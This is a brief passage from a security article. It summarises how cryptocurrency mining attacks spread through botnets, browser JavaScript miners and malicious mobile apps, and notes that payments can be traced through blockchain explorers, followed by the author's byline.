Cryptocurrency mining attacks spread in several ways: through botnets exploiting unpatched machines, through browser-based JavaScript miners, and through malicious mobile apps. Many attackers have started to earn money this way, and the flow of coins to a miner's address can be followed through the public blockchain explorer apps available on the internet.

AUTHOR

RamKumar G
Security Engineer
BriskInfoSec Technology and Consulting Pvt Ltd
Find me at https://www.linkedin.com/in/ram-kumar-3439b511a/